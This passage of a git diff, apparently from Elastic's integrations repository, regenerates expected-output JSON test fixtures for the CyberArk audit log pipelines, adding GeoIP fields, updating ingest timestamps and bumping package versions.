}, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "mporain 2019-11-01 10:16:48.692538723 +0000 UTC eratvo7756.localdomain %CYBERARK: MessageID=\"179\";Version=1.4965;Message=allow;Issuer=alorumwr;Station=10.146.61.5;File=tvolu;Safe=imve;Location=ollitan;Category=temseq;RequestId=vol;Reason=loremips;Severity=high;SourceUser=eturadi;TargetUser=umS;GatewayStation=10.77.9.17;TicketID=henderi;PolicyID=taevitae;UserName=tevel;LogonDomain=tatemse5403.home;Address=iquipexe4708.api.localhost;CPMStatus=quuntur;Port=5473;Database=amremap;DeviceType=oremagna;ExtraDetails=aqu;", "event": { - "ingested": "2021-06-09T10:19:22.411224500Z" + "ingested": "2021-12-14T14:41:55.823590502Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "%CYBERARK: MessageID=\"83\";tvolu 1.2244\",ProductAccount=\"ore\",ProductProcess=\"lors\",EventId=\"saute\",EventClass=\"ecillumd\",EventSeverity=\"high\",EventMessage=\"allow\",ActingUserName=\"sequatu\",ActingAddress=\"10.128.102.130\",ActionSourceUser=\"mdoloree\",ActionTargetUser=\"que\",ActionObject=\"inBCSed\",ActionSafe=\"cteturad\",ActionLocation=\"umq\",ActionCategory=\"ita\",ActionRequestId=\"ipsaquae\",ActionReason=\"olu\",ActionExtraDetails=\"exerci\"", "event": { - "ingested": "2021-06-09T10:19:22.411228600Z" + "ingested": "2021-12-14T14:41:55.823591064Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "2019-11-30 00:21:57.212538723 +0000 UTC moen6809.internal.example %CYBERARK: MessageID=\"150\";Version=1.7701;Message=cancel;Issuer=reseo;Station=10.31.86.83;File=pariat;Safe=icaboNe;Location=boreetd;Category=uir;RequestId=rumex;Reason=ectobea;Severity=medium;SourceUser=tamrem;TargetUser=doloremi;GatewayStation=10.200.162.248;TicketID=uptate;PolicyID=giatquo;UserName=onnu;LogonDomain=reprehe650.www.corp;Address=oremip4070.www5.invalid;CPMStatus=turad;Port=1704;Database=billo;DeviceType=doloremi;ExtraDetails=ectetura;", "event": { - "ingested": "2021-06-09T10:19:22.411232800Z" + "ingested": "2021-12-14T14:41:55.823591678Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "%CYBERARK: MessageID=\"166\";cul 1.3325\",ProductAccount=\"atatn\",ProductProcess=\"ipisc\",EventId=\"iatnulap\",EventClass=\"roi\",EventSeverity=\"high\",EventMessage=\"allow\",ActingUserName=\"volup\",ActingAddress=\"10.103.215.159\",ActionSourceUser=\"ddoeiusm\",ActionTargetUser=\"apa\",ActionObject=\"archite\",ActionSafe=\"tur\",ActionLocation=\"ddo\",ActionCategory=\"emp\",ActionRequestId=\"inBC\",ActionReason=\"did\",ActionExtraDetails=\"atcupi\"", "event": { - "ingested": "2021-06-09T10:19:22.411237300Z" + "ingested": "2021-12-14T14:41:55.823592243Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" diff --git a/packages/cyberark/manifest.yml b/packages/cyberark/manifest.yml index e204f0cd055..d3366e933c2 100644 --- a/packages/cyberark/manifest.yml +++ b/packages/cyberark/manifest.yml @@ -1,7 +1,7 @@ format_version: 1.0.0 name: cyberark title: CyberArk -version: 0.4.4 +version: 0.4.5 description: Deprecated. Use CyberArk Privileged Access Security instead. categories: ["security"] release: experimental diff --git a/packages/cyberarkpas/changelog.yml b/packages/cyberarkpas/changelog.yml index 5a3e270afb0..1bd62b46572 100644 --- a/packages/cyberarkpas/changelog.yml +++ b/packages/cyberarkpas/changelog.yml @@ -1,4 +1,9 @@ # newer versions go on top +- version: "2.2.2" + changes: + - description: Regenerate test files using the new GeoIP database + type: bugfix + link: https://github.com/elastic/integrations/pull/2339 - version: "2.2.1" changes: - description: Change test public IPs to the supported subset diff --git a/packages/cyberarkpas/data_stream/audit/_dev/test/pipeline/test-105-add-file-category.log-expected.json b/packages/cyberarkpas/data_stream/audit/_dev/test/pipeline/test-105-add-file-category.log-expected.json index fac8bcfa4dd..1251592ebde 100644 --- a/packages/cyberarkpas/data_stream/audit/_dev/test/pipeline/test-105-add-file-category.log-expected.json +++ b/packages/cyberarkpas/data_stream/audit/_dev/test/pipeline/test-105-add-file-category.log-expected.json @@ -63,7 +63,7 @@ "event": { "severity": 2, "action": "add file category", - "ingested": "2021-12-09T13:36:36.022887100Z", + "ingested": "2021-12-14T14:41:59.088381649Z", "original": "\u003c5\u003e1 2021-03-08T18:24:49Z VAULT {\"format\":\"elastic\",\"version\":\"1.0\",\"syslog\":{\"audit_record\":{\"Rfc5424\":\"yes\",\"Timestamp\":\"Mar 08 10:24:49\",\"IsoTimestamp\":\"2021-03-08T18:24:49Z\",\"Hostname\":\"VAULT\",\"Vendor\":\"Cyber-Ark\",\"Product\":\"Vault\",\"Version\":\"11.7.0000\",\"MessageID\":\"105\",\"Desc\":\"Add File Category\",\"Severity\":\"Info\",\"Issuer\":\"Administrator\",\"Action\":\"Add File Category\",\"SourceUser\":\"\",\"TargetUser\":\"\",\"Safe\":\"Test\",\"File\":\"Root\\\\Operating System-WinDesktopLocal-Address-adriansr\",\"Station\":\"127.0.0.1\",\"Location\":\"\",\"Category\":\"Address\",\"RequestId\":\"\",\"Reason\":\"Value=[Address]\",\"ExtraDetails\":\"\",\"Message\":\"Add File Category\",\"GatewayStation\":\"10.0.1.20\"}}}", "code": "105", "kind": "event" @@ -76,6 +76,15 @@ } }, "source": { + "geo": { + "continent_name": "Asia", + "country_name": "Bhutan", + "location": { + "lon": 90.5, + "lat": 27.5 + }, + "country_iso_code": "BT" + }, "address": "67.43.156.13", "ip": "67.43.156.13" }, @@ -122,7 +131,7 @@ "event": { "severity": 2, "action": "add file category", - "ingested": "2021-12-09T13:36:36.022896800Z", + "ingested": "2021-12-14T14:41:59.088384244Z", "original": "\u003c5\u003e1 2021-03-10T09:11:54Z VAULT {\"format\":\"elastic\",\"version\":\"1.0\",\"syslog\":{\"audit_record\":{\"Rfc5424\":\"yes\",\"Timestamp\":\"Mar 10 01:11:54\",\"IsoTimestamp\":\"2021-03-10T09:11:54Z\",\"Hostname\":\"VAULT\",\"Vendor\":\"Cyber-Ark\",\"Product\":\"Vault\",\"Version\":\"11.7.0000\",\"MessageID\":\"105\",\"Desc\":\"Add File Category\",\"Severity\":\"Info\",\"Issuer\":\"PSMPApp_localhost.localdomain\",\"Action\":\"Add File Category\",\"SourceUser\":\"\",\"TargetUser\":\"\",\"Safe\":\"PSMPLiveSessions\",\"File\":\"Root\\\\PSMPApp_localhost.localdomain.LiveSessions\",\"Station\":\"67.43.156.13\",\"Location\":\"\",\"Category\":\"_PSMLiveSessions_1\",\"RequestId\":\"\",\"Reason\":\"\",\"ExtraDetails\":\"\",\"Message\":\"Add File Category\",\"GatewayStation\":\"\"}}}", "code": "105", "kind": "event" @@ -135,6 +144,15 @@ } }, "source": { + "geo": { + "continent_name": "Asia", + "country_name": "Bhutan", + "location": { + "lon": 90.5, + "lat": 27.5 + }, + "country_iso_code": "BT" + }, "address": "67.43.156.13", "ip": "67.43.156.13" }, @@ -181,7 +199,7 @@ "event": { "severity": 2, "action": "add file category", - "ingested": "2021-12-09T13:36:36.022905400Z", + "ingested": "2021-12-14T14:41:59.088384691Z", "original": "\u003c5\u003e1 2021-03-10T18:46:48Z VAULT {\"format\":\"elastic\",\"version\":\"1.0\",\"syslog\":{\"audit_record\":{\"Rfc5424\":\"yes\",\"Timestamp\":\"Mar 10 10:46:48\",\"IsoTimestamp\":\"2021-03-10T18:46:48Z\",\"Hostname\":\"VAULT\",\"Vendor\":\"Cyber-Ark\",\"Product\":\"Vault\",\"Version\":\"11.7.0000\",\"MessageID\":\"105\",\"Desc\":\"Add File Category\",\"Severity\":\"Info\",\"Issuer\":\"PSMApp_VAGRANT\",\"Action\":\"Add File Category\",\"SourceUser\":\"\",\"TargetUser\":\"\",\"Safe\":\"PSMLiveSessions\",\"File\":\"Root\\\\PSMServer.LiveSessions\",\"Station\":\"67.43.156.13\",\"Location\":\"\",\"Category\":\"_PSMLiveSessions_1\",\"RequestId\":\"\",\"Reason\":\"\",\"ExtraDetails\":\"\",\"Message\":\"Add File Category\",\"GatewayStation\":\"\"}}}", "code": "105", "kind": "event" @@ -194,6 +212,15 @@ } }, "source": { + "geo": { + "continent_name": "Asia", + "country_name": "Bhutan", + "location": { + "lon": 90.5, + "lat": 27.5 + }, + "country_iso_code": "BT" + }, "address": "67.43.156.14", "ip": "67.43.156.14" }, @@ -241,7 +268,7 @@ "event": { "severity": 2, "action": "add file category", - "ingested": "2021-12-09T13:36:36.022911900Z", + "ingested": "2021-12-14T14:41:59.088385080Z", "original": "\u003c5\u003e1 2021-03-10T22:17:26Z VAULT {\"format\":\"elastic\",\"version\":\"1.0\",\"syslog\":{\"audit_record\":{\"Rfc5424\":\"yes\",\"Timestamp\":\"Mar 10 14:17:26\",\"IsoTimestamp\":\"2021-03-10T22:17:26Z\",\"Hostname\":\"VAULT\",\"Vendor\":\"Cyber-Ark\",\"Product\":\"Vault\",\"Version\":\"11.7.0000\",\"MessageID\":\"105\",\"Desc\":\"Add File Category\",\"Severity\":\"Info\",\"Issuer\":\"Administrator\",\"Action\":\"Add File Category\",\"SourceUser\":\"\",\"TargetUser\":\"\",\"Safe\":\"PSM\",\"File\":\"Root\\\\PSM-ASR-CYBERARK-WI\",\"Station\":\"67.43.156.14\",\"Location\":\"\",\"Category\":\"LogonDomain\",\"RequestId\":\"\",\"Reason\":\"Value=[ASR-CYBERARK-WI]\",\"ExtraDetails\":\"\",\"Message\":\"Add File Category\",\"GatewayStation\":\"\"}}}", "code": "105", "kind": "event" @@ -254,6 +281,15 @@ } }, "source": { + "geo": { + "continent_name": "Asia", + "country_name": "Bhutan", + "location": { + "lon": 90.5, + "lat": 27.5 + }, + "country_iso_code": "BT" + }, "address": "67.43.156.14", "ip": "67.43.156.14" }, @@ -300,7 +336,7 @@ "event": { "severity": 2, "action": "add file category", - "ingested": "2021-12-09T13:36:36.022918200Z", + "ingested": "2021-12-14T14:41:59.088385539Z", "original": "\u003c5\u003e1 2021-03-10T22:20:12Z VAULT {\"format\":\"elastic\",\"version\":\"1.0\",\"syslog\":{\"audit_record\":{\"Rfc5424\":\"yes\",\"Timestamp\":\"Mar 10 14:20:12\",\"IsoTimestamp\":\"2021-03-10T22:20:12Z\",\"Hostname\":\"VAULT\",\"Vendor\":\"Cyber-Ark\",\"Product\":\"Vault\",\"Version\":\"11.7.0000\",\"MessageID\":\"105\",\"Desc\":\"Add File Category\",\"Severity\":\"Info\",\"Issuer\":\"PSMApp_ASR-WIN\",\"Action\":\"Add File Category\",\"SourceUser\":\"\",\"TargetUser\":\"\",\"Safe\":\"PSMLiveSessions\",\"File\":\"Root\\\\PSM-ASR-CYBERARK-WI.LiveSessions\",\"Station\":\"67.43.156.14\",\"Location\":\"\",\"Category\":\"_PSMLiveSessions_1\",\"RequestId\":\"\",\"Reason\":\"\",\"ExtraDetails\":\"\",\"Message\":\"Add File Category\",\"GatewayStation\":\"\"}}}", "code": "105", "kind": "event" @@ -313,6 +349,15 @@ } }, "source": { + "geo": { + "continent_name": "Asia", + "country_name": "Bhutan", + "location": { + "lon": 90.5, + "lat": 27.5 + }, + "country_iso_code": "BT" + }, "address": "67.43.156.13", "ip": "67.43.156.13" }, @@ -360,7 +405,7 @@ "event": { "severity": 2, "action": "add file category", - "ingested": "2021-12-09T13:36:36.022924500Z", + "ingested": "2021-12-14T14:41:59.088385938Z", "original": "\u003c5\u003e1 2021-03-11T16:59:58Z VAULT {\"format\":\"elastic\",\"version\":\"1.0\",\"raw\":\"\u003csyslog\u003e\\n\\n \u003caudit_record\u003e\\n \u003cRfc5424\u003eyes\u003c/Rfc5424\u003e\\n \u003cTimestamp\u003eMar 11 08:59:58\u003c/Timestamp\u003e\\n \u003cIsoTimestamp\u003e2021-03-11T16:59:58Z\u003c/IsoTimestamp\u003e\\n \u003cHostname\u003eVAULT\u003c/Hostname\u003e\\n \u003cVendor\u003eCyber-Ark\u003c/Vendor\u003e\\n \u003cProduct\u003eVault\u003c/Product\u003e\\n \u003cVersion\u003e11.7.0000\u003c/Version\u003e\\n \u003cMessageID\u003e105\u003c/MessageID\u003e\\n \u003cDesc\u003eAdd File Category\u003c/Desc\u003e\\n \u003cSeverity\u003eInfo\u003c/Severity\u003e\\n \u003cIssuer\u003ePSMPApp_VAGRANT\u003c/Issuer\u003e\\n \u003cAction\u003eAdd File Category\u003c/Action\u003e\\n \u003cSourceUser\u003e\u003c/SourceUser\u003e\\n \u003cTargetUser\u003e\u003c/TargetUser\u003e\\n \u003cSafe\u003ePSMPLiveSessions\u003c/Safe\u003e\\n \u003cFile\u003eRoot\\\\PSMPApp_VAGRANT.LiveSessions\u003c/File\u003e\\n \u003cStation\u003e67.43.156.13\u003c/Station\u003e\\n \u003cLocation\u003e\u003c/Location\u003e\\n \u003cCategory\u003e_PSMLiveSessions_1\u003c/Category\u003e\\n \u003cRequestId\u003e\u003c/RequestId\u003e\\n \u003cReason\u003e\u003c/Reason\u003e\\n \u003cExtraDetails\u003e\u003c/ExtraDetails\u003e\\n \u003cMessage\u003eAdd File Category\u003c/Message\u003e\\n \u003cGatewayStation\u003e\u003c/GatewayStation\u003e\\n \u003c/audit_record\u003e\\n\\n\u003c/syslog\u003e\",\"syslog\":{\"audit_record\":{\"Rfc5424\":\"yes\",\"Timestamp\":\"Mar 11 08:59:58\",\"IsoTimestamp\":\"2021-03-11T16:59:58Z\",\"Hostname\":\"VAULT\",\"Vendor\":\"Cyber-Ark\",\"Product\":\"Vault\",\"Version\":\"11.7.0000\",\"MessageID\":\"105\",\"Desc\":\"Add File Category\",\"Severity\":\"Info\",\"Issuer\":\"PSMPApp_VAGRANT\",\"Action\":\"Add File Category\",\"SourceUser\":\"\",\"TargetUser\":\"\",\"Safe\":\"PSMPLiveSessions\",\"File\":\"Root\\\\PSMPApp_VAGRANT.LiveSessions\",\"Station\":\"67.43.156.13\",\"Location\":\"\",\"Category\":\"_PSMLiveSessions_1\",\"RequestId\":\"\",\"Reason\":\"\",\"ExtraDetails\":\"\",\"Message\":\"Add File Category\",\"GatewayStation\":\"\"}}}", "code": "105", "kind": "event" diff --git a/packages/cyberarkpas/data_stream/audit/_dev/test/pipeline/test-106-update-file-category.log-expected.json b/packages/cyberarkpas/data_stream/audit/_dev/test/pipeline/test-106-update-file-category.log-expected.json index ed15633b613..af26c98f45c 100644 --- a/packages/cyberarkpas/data_stream/audit/_dev/test/pipeline/test-106-update-file-category.log-expected.json +++ b/packages/cyberarkpas/data_stream/audit/_dev/test/pipeline/test-106-update-file-category.log-expected.json @@ -63,7 +63,7 @@ "event": { "severity": 2, "action": "update file category", - "ingested": "2021-12-09T13:36:36.540129800Z", + "ingested": "2021-12-14T14:41:59.810329341Z", "original": "\u003c5\u003e1 2021-03-08T18:25:52Z VAULT {\"format\":\"elastic\",\"version\":\"1.0\",\"syslog\":{\"audit_record\":{\"Rfc5424\":\"yes\",\"Timestamp\":\"Mar 08 10:25:52\",\"IsoTimestamp\":\"2021-03-08T18:25:52Z\",\"Hostname\":\"VAULT\",\"Vendor\":\"Cyber-Ark\",\"Product\":\"Vault\",\"Version\":\"11.7.0000\",\"MessageID\":\"106\",\"Desc\":\"Update File Category\",\"Severity\":\"Info\",\"Issuer\":\"Administrator\",\"Action\":\"Update File Category\",\"SourceUser\":\"\",\"TargetUser\":\"\",\"Safe\":\"Test\",\"File\":\"Root\\\\Operating System-WinDesktopLocal-Address-adriansr\",\"Station\":\"127.0.0.1\",\"Location\":\"\",\"Category\":\"Address\",\"RequestId\":\"\",\"Reason\":\"Value=[components] Old Value=[Address]\",\"ExtraDetails\":\"\",\"Message\":\"Update File Category\",\"GatewayStation\":\"10.0.1.20\"}}}", "code": "106", "kind": "event" @@ -76,6 +76,15 @@ } }, "source": { + "geo": { + "continent_name": "Asia", + "country_name": "Bhutan", + "location": { + "lon": 90.5, + "lat": 27.5 + }, + "country_iso_code": "BT" + }, "address": "67.43.156.13", "ip": "67.43.156.13" }, @@ -122,7 +131,7 @@ "event": { "severity": 2, "action": "update file category", - "ingested": "2021-12-09T13:36:36.540137800Z", + "ingested": "2021-12-14T14:41:59.810332387Z", "original": "\u003c5\u003e1 2021-03-10T18:46:48Z VAULT {\"format\":\"elastic\",\"version\":\"1.0\",\"syslog\":{\"audit_record\":{\"Rfc5424\":\"yes\",\"Timestamp\":\"Mar 10 10:46:48\",\"IsoTimestamp\":\"2021-03-10T18:46:48Z\",\"Hostname\":\"VAULT\",\"Vendor\":\"Cyber-Ark\",\"Product\":\"Vault\",\"Version\":\"11.7.0000\",\"MessageID\":\"106\",\"Desc\":\"Update File Category\",\"Severity\":\"Info\",\"Issuer\":\"PSMApp_VAGRANT\",\"Action\":\"Update File Category\",\"SourceUser\":\"\",\"TargetUser\":\"\",\"Safe\":\"PSMLiveSessions\",\"File\":\"Root\\\\PSMServer.LiveSessions\",\"Station\":\"67.43.156.13\",\"Location\":\"\",\"Category\":\"_PSMLiveSessions_1\",\"RequestId\":\"\",\"Reason\":\"\",\"ExtraDetails\":\"\",\"Message\":\"Update File Category\",\"GatewayStation\":\"\"}}}", "code": "106", "kind": "event" @@ -135,6 +144,15 @@ } }, "source": { + "geo": { + "continent_name": "Asia", + "country_name": "Bhutan", + "location": { + "lon": 90.5, + "lat": 27.5 + }, + "country_iso_code": "BT" + }, "address": "67.43.156.14", "ip": "67.43.156.14" }, @@ -181,7 +199,7 @@ "event": { "severity": 2, "action": "update file category", - "ingested": "2021-12-09T13:36:36.540143Z", + "ingested": "2021-12-14T14:41:59.810332861Z", "original": "\u003c5\u003e1 2021-03-10T22:20:12Z VAULT {\"format\":\"elastic\",\"version\":\"1.0\",\"syslog\":{\"audit_record\":{\"Rfc5424\":\"yes\",\"Timestamp\":\"Mar 10 14:20:12\",\"IsoTimestamp\":\"2021-03-10T22:20:12Z\",\"Hostname\":\"VAULT\",\"Vendor\":\"Cyber-Ark\",\"Product\":\"Vault\",\"Version\":\"11.7.0000\",\"MessageID\":\"106\",\"Desc\":\"Update File Category\",\"Severity\":\"Info\",\"Issuer\":\"PSMApp_ASR-WIN\",\"Action\":\"Update File Category\",\"SourceUser\":\"\",\"TargetUser\":\"\",\"Safe\":\"PSMLiveSessions\",\"File\":\"Root\\\\PSM-ASR-CYBERARK-WI.LiveSessions\",\"Station\":\"67.43.156.14\",\"Location\":\"\",\"Category\":\"_PSMLiveSessions_1\",\"RequestId\":\"\",\"Reason\":\"\",\"ExtraDetails\":\"\",\"Message\":\"Update File Category\",\"GatewayStation\":\"\"}}}", "code": "106", "kind": "event" @@ -194,6 +212,15 @@ } }, "source": { + "geo": { + "continent_name": "Asia", + "country_name": "Bhutan", + "location": { + "lon": 90.5, + "lat": 27.5 + }, + "country_iso_code": "BT" + }, "address": "67.43.156.13", "ip": "67.43.156.13" }, @@ -241,7 +268,7 @@ "event": { "severity": 2, "action": "update file category", - "ingested": "2021-12-09T13:36:36.540147600Z", + "ingested": "2021-12-14T14:41:59.810333250Z", "original": "\u003c5\u003e1 2021-03-11T17:38:26Z VAULT {\"format\":\"elastic\",\"version\":\"1.0\",\"raw\":\"\u003csyslog\u003e\\n\\n \u003caudit_record\u003e\\n \u003cRfc5424\u003eyes\u003c/Rfc5424\u003e\\n \u003cTimestamp\u003eMar 11 09:38:26\u003c/Timestamp\u003e\\n \u003cIsoTimestamp\u003e2021-03-11T17:38:26Z\u003c/IsoTimestamp\u003e\\n \u003cHostname\u003eVAULT\u003c/Hostname\u003e\\n \u003cVendor\u003eCyber-Ark\u003c/Vendor\u003e\\n \u003cProduct\u003eVault\u003c/Product\u003e\\n \u003cVersion\u003e11.7.0000\u003c/Version\u003e\\n \u003cMessageID\u003e106\u003c/MessageID\u003e\\n \u003cDesc\u003eUpdate File Category\u003c/Desc\u003e\\n \u003cSeverity\u003eInfo\u003c/Severity\u003e\\n \u003cIssuer\u003ePSMPApp_VAGRANT\u003c/Issuer\u003e\\n \u003cAction\u003eUpdate File Category\u003c/Action\u003e\\n \u003cSourceUser\u003e\u003c/SourceUser\u003e\\n \u003cTargetUser\u003e\u003c/TargetUser\u003e\\n \u003cSafe\u003ePSMRecordings\u003c/Safe\u003e\\n \u003cFile\u003eroot\\\\87012dcc-8290-11eb-949e-080027efd402.session\u003c/File\u003e\\n \u003cStation\u003e67.43.156.13\u003c/Station\u003e\\n \u003cLocation\u003e\u003c/Location\u003e\\n \u003cCategory\u003ePSMStatus\u003c/Category\u003e\\n \u003cRequestId\u003e\u003c/RequestId\u003e\\n \u003cReason\u003e\u003c/Reason\u003e\\n \u003cExtraDetails\u003e\u003c/ExtraDetails\u003e\\n \u003cMessage\u003eUpdate File Category\u003c/Message\u003e\\n \u003cGatewayStation\u003e\u003c/GatewayStation\u003e\\n \u003c/audit_record\u003e\\n\\n\u003c/syslog\u003e\",\"syslog\":{\"audit_record\":{\"Rfc5424\":\"yes\",\"Timestamp\":\"Mar 11 09:38:26\",\"IsoTimestamp\":\"2021-03-11T17:38:26Z\",\"Hostname\":\"VAULT\",\"Vendor\":\"Cyber-Ark\",\"Product\":\"Vault\",\"Version\":\"11.7.0000\",\"MessageID\":\"106\",\"Desc\":\"Update File Category\",\"Severity\":\"Info\",\"Issuer\":\"PSMPApp_VAGRANT\",\"Action\":\"Update File Category\",\"SourceUser\":\"\",\"TargetUser\":\"\",\"Safe\":\"PSMRecordings\",\"File\":\"root\\\\87012dcc-8290-11eb-949e-080027efd402.session\",\"Station\":\"67.43.156.13\",\"Location\":\"\",\"Category\":\"PSMStatus\",\"RequestId\":\"\",\"Reason\":\"\",\"ExtraDetails\":\"\",\"Message\":\"Update File Category\",\"GatewayStation\":\"\"}}}", "code": "106", "kind": "event" @@ -254,6 +281,15 @@ } }, "source": { + "geo": { + "continent_name": "Asia", + "country_name": "Bhutan", + "location": { + "lon": 90.5, + "lat": 27.5 + }, + "country_iso_code": "BT" + }, "address": "67.43.156.15", "ip": "67.43.156.15" }, @@ -301,7 +337,7 @@ "event": { "severity": 2, "action": "update file category", - "ingested": "2021-12-09T13:36:36.540154900Z", + "ingested": "2021-12-14T14:41:59.810333652Z", "original": "\u003c5\u003e1 2021-03-11T20:10:33Z VAULT {\"format\":\"elastic\",\"version\":\"1.0\",\"raw\":\"\u003csyslog\u003e\\n\\n \u003caudit_record\u003e\\n \u003cRfc5424\u003eyes\u003c/Rfc5424\u003e\\n \u003cTimestamp\u003eMar 11 12:10:33\u003c/Timestamp\u003e\\n \u003cIsoTimestamp\u003e2021-03-11T20:10:33Z\u003c/IsoTimestamp\u003e\\n \u003cHostname\u003eVAULT\u003c/Hostname\u003e\\n \u003cVendor\u003eCyber-Ark\u003c/Vendor\u003e\\n \u003cProduct\u003eVault\u003c/Product\u003e\\n \u003cVersion\u003e11.7.0000\u003c/Version\u003e\\n \u003cMessageID\u003e106\u003c/MessageID\u003e\\n \u003cDesc\u003eUpdate File Category\u003c/Desc\u003e\\n \u003cSeverity\u003eInfo\u003c/Severity\u003e\\n \u003cIssuer\u003ePSMApp_ASR-WIN\u003c/Issuer\u003e\\n \u003cAction\u003eUpdate File Category\u003c/Action\u003e\\n \u003cSourceUser\u003e\u003c/SourceUser\u003e\\n \u003cTargetUser\u003e\u003c/TargetUser\u003e\\n \u003cSafe\u003ePSMLiveSessions\u003c/Safe\u003e\\n \u003cFile\u003eRoot\\\\PSM-ASR-CYBERARK-WI.LiveSessions\u003c/File\u003e\\n \u003cStation\u003e67.43.156.15\u003c/Station\u003e\\n \u003cLocation\u003e\u003c/Location\u003e\\n \u003cCategory\u003e_PSMLiveSessions_1\u003c/Category\u003e\\n \u003cRequestId\u003e\u003c/RequestId\u003e\\n \u003cReason\u003e\u003c/Reason\u003e\\n \u003cExtraDetails\u003e\u003c/ExtraDetails\u003e\\n \u003cMessage\u003eUpdate File Category\u003c/Message\u003e\\n \u003cGatewayStation\u003e\u003c/GatewayStation\u003e\\n \u003c/audit_record\u003e\\n\\n\u003c/syslog\u003e\",\"syslog\":{\"audit_record\":{\"Rfc5424\":\"yes\",\"Timestamp\":\"Mar 11 12:10:33\",\"IsoTimestamp\":\"2021-03-11T20:10:33Z\",\"Hostname\":\"VAULT\",\"Vendor\":\"Cyber-Ark\",\"Product\":\"Vault\",\"Version\":\"11.7.0000\",\"MessageID\":\"106\",\"Desc\":\"Update File Category\",\"Severity\":\"Info\",\"Issuer\":\"PSMApp_ASR-WIN\",\"Action\":\"Update File Category\",\"SourceUser\":\"\",\"TargetUser\":\"\",\"Safe\":\"PSMLiveSessions\",\"File\":\"Root\\\\PSM-ASR-CYBERARK-WI.LiveSessions\",\"Station\":\"67.43.156.15\",\"Location\":\"\",\"Category\":\"_PSMLiveSessions_1\",\"RequestId\":\"\",\"Reason\":\"\",\"ExtraDetails\":\"\",\"Message\":\"Update File Category\",\"GatewayStation\":\"\"}}}", "code": "106", "kind": "event" @@ -314,6 +350,15 @@ } }, "source": { + "geo": { + "continent_name": "Asia", + "country_name": "Bhutan", + "location": { + "lon": 90.5, + "lat": 27.5 + }, + "country_iso_code": "BT" + }, "address": "67.43.156.15", "ip": "67.43.156.15" }, @@ -361,7 +406,7 @@ "event": { "severity": 2, "action": "update file category", - "ingested": "2021-12-09T13:36:36.540163300Z", + "ingested": "2021-12-14T14:41:59.810334113Z", "original": "\u003c5\u003e1 2021-03-14T13:49:38Z VAULT {\"format\":\"elastic\",\"version\":\"1.0\",\"raw\":\"\u003csyslog\u003e\\n\\n \u003caudit_record\u003e\\n \u003cRfc5424\u003eyes\u003c/Rfc5424\u003e\\n \u003cTimestamp\u003eMar 14 06:49:38\u003c/Timestamp\u003e\\n \u003cIsoTimestamp\u003e2021-03-14T13:49:38Z\u003c/IsoTimestamp\u003e\\n \u003cHostname\u003eVAULT\u003c/Hostname\u003e\\n \u003cVendor\u003eCyber-Ark\u003c/Vendor\u003e\\n \u003cProduct\u003eVault\u003c/Product\u003e\\n \u003cVersion\u003e11.7.0000\u003c/Version\u003e\\n \u003cMessageID\u003e106\u003c/MessageID\u003e\\n \u003cDesc\u003eUpdate File Category\u003c/Desc\u003e\\n \u003cSeverity\u003eInfo\u003c/Severity\u003e\\n \u003cIssuer\u003ePSMPApp_SSH\u003c/Issuer\u003e\\n \u003cAction\u003eUpdate File Category\u003c/Action\u003e\\n \u003cSourceUser\u003e\u003c/SourceUser\u003e\\n \u003cTargetUser\u003e\u003c/TargetUser\u003e\\n \u003cSafe\u003ePSMPLiveSessions\u003c/Safe\u003e\\n \u003cFile\u003eRoot\\\\PSMPApp_SSH.LiveSessions\u003c/File\u003e\\n \u003cStation\u003e67.43.156.15\u003c/Station\u003e\\n \u003cLocation\u003e\u003c/Location\u003e\\n \u003cCategory\u003e_PSMLiveSessions_1\u003c/Category\u003e\\n \u003cRequestId\u003e\u003c/RequestId\u003e\\n \u003cReason\u003e\u003c/Reason\u003e\\n \u003cExtraDetails\u003e\u003c/ExtraDetails\u003e\\n \u003cMessage\u003eUpdate File Category\u003c/Message\u003e\\n \u003cGatewayStation\u003e\u003c/GatewayStation\u003e\\n \u003c/audit_record\u003e\\n\\n\u003c/syslog\u003e\",\"syslog\":{\"audit_record\":{\"Rfc5424\":\"yes\",\"Timestamp\":\"Mar 14 06:49:38\",\"IsoTimestamp\":\"2021-03-14T13:49:38Z\",\"Hostname\":\"VAULT\",\"Vendor\":\"Cyber-Ark\",\"Product\":\"Vault\",\"Version\":\"11.7.0000\",\"MessageID\":\"106\",\"Desc\":\"Update File Category\",\"Severity\":\"Info\",\"Issuer\":\"PSMPApp_SSH\",\"Action\":\"Update File Category\",\"SourceUser\":\"\",\"TargetUser\":\"\",\"Safe\":\"PSMPLiveSessions\",\"File\":\"Root\\\\PSMPApp_SSH.LiveSessions\",\"Station\":\"67.43.156.15\",\"Location\":\"\",\"Category\":\"_PSMLiveSessions_1\",\"RequestId\":\"\",\"Reason\":\"\",\"ExtraDetails\":\"\",\"Message\":\"Update File Category\",\"GatewayStation\":\"\"}}}", "code": "106", "kind": "event" diff --git a/packages/cyberarkpas/data_stream/audit/_dev/test/pipeline/test-107-delete-file-category.log-expected.json b/packages/cyberarkpas/data_stream/audit/_dev/test/pipeline/test-107-delete-file-category.log-expected.json index 0ceb6fe61d6..3695ae92aa8 100644 --- a/packages/cyberarkpas/data_stream/audit/_dev/test/pipeline/test-107-delete-file-category.log-expected.json +++ b/packages/cyberarkpas/data_stream/audit/_dev/test/pipeline/test-107-delete-file-category.log-expected.json @@ -64,7 +64,7 @@ "event": { "severity": 2, "action": "delete file category", - "ingested": "2021-12-09T13:36:37.089518600Z", + "ingested": "2021-12-14T14:42:00.551472344Z", "original": "\u003c5\u003e1 2021-03-15T10:22:24Z VAULT {\"format\":\"elastic\",\"version\":\"1.0\",\"raw\":\"\u003csyslog\u003e\\n\\n \u003caudit_record\u003e\\n \u003cRfc5424\u003eyes\u003c/Rfc5424\u003e\\n \u003cTimestamp\u003eMar 15 03:22:24\u003c/Timestamp\u003e\\n \u003cIsoTimestamp\u003e2021-03-15T10:22:24Z\u003c/IsoTimestamp\u003e\\n \u003cHostname\u003eVAULT\u003c/Hostname\u003e\\n \u003cVendor\u003eCyber-Ark\u003c/Vendor\u003e\\n \u003cProduct\u003eVault\u003c/Product\u003e\\n \u003cVersion\u003e11.7.0000\u003c/Version\u003e\\n 